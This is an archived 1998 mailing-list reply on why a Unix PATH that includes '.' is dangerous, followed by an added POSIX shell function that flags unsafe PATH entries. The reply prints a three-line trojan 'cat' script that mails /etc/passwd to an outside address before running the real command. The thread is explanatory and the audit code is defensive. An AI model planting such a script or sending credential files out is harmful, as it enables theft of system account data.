On Sat, 29 Aug 1998, Gevaerts Frank wrote:

> If you don't have '.' in your path, you can't execute programs in the
> current directory, unless you type in a full pathname. If you have it in
> your path, and some malicious user makes a nasty script and calls it ls,
> if you try to do 'ls' in his home directory, you will in fact execute his
> script.
> You can avoid this by placing '.' last in your path, but as the FAQ points
> out, our evil user could then make a script 'sl', hoping you would make a
> typo in his home directory.
> If you don't have '.' in your path at all, but only /bin, /usr/bin ...,
> you can only execute binaries in those directories, in which normal users
> can't (or shouldn't be able to) change anything.
> 
There is an even more serious possibility if a user has '.' at the start
of their path.  Consider a user with '.' in their path, who has a login
script something like:
# .bash_profile

# Get the aliases and functions
if [ -f ~/.bashrc ]; then
        . ~/.bashrc
fi

# User specific environment and startup programs

PATH=.:$PATH:$HOME/bin
ENV=$HOME/.bashrc
USERNAME=""

export USERNAME ENV PATH

cat ~/todo

Now a hacker creates a script in that user's home directory, called cat,
that does
#!/bin/bash
/bin/cat /etc/passwd | mail [EMAIL PROTECTED]
/bin/cat $*

Now the next time your user logs in, your password file gets mailed and
the hacker can carry out a dictionary attack.  Not good.

--
Mike <[EMAIL PROTECTED]>

It is so stupid of modern civilisation to have given up believing in the
devil when he is the only explanation of it.
                -- Ronald Knox, "Let Dons Delight"
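
Added example, not part of the original message: a POSIX shell check for the condition discussed in this thread. It flags PATH entries that are '.', empty (which the shell also searches as the current directory) or otherwise relative, plus absolute directories that are world-writable. The function name audit_path is hypothetical.

```shell
#!/bin/sh
# Added example; audit_path is a hypothetical helper name, not from the thread.
# Returns 0 if every entry of a PATH-style string is an absolute directory
# that is not world-writable, 1 otherwise. Findings are written to stdout.
audit_path() {
    ap_rest="${1-$PATH}:"      # sentinel colon keeps a trailing empty entry
    ap_status=0
    while [ -n "$ap_rest" ]; do
        ap_entry=${ap_rest%%:*}
        ap_rest=${ap_rest#*:}
        case $ap_entry in
            '')
                # "::", a leading ":" or a trailing ":" is searched as '.'
                echo "UNSAFE: empty entry (searched as the current directory)"
                ap_status=1 ;;
            /*)
                # Absolute path: still a risk if anyone may drop files there.
                # -H follows a symlinked entry such as /bin -> usr/bin.
                if [ -d "$ap_entry" ] &&
                   [ -n "$(find -H "$ap_entry" -prune -perm -0002 -print 2>/dev/null)" ]; then
                    echo "UNSAFE: world-writable directory '$ap_entry'"
                    ap_status=1
                fi ;;
            *)
                # '.', '..', 'bin', ... all resolve against the current directory
                echo "UNSAFE: relative entry '$ap_entry'"
                ap_status=1 ;;
        esac
    done
    return "$ap_status"
}
```

Called with no argument, audit_path checks the current $PATH; the PATH=.:$PATH:$HOME/bin line from the login script above fails on its first entry.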
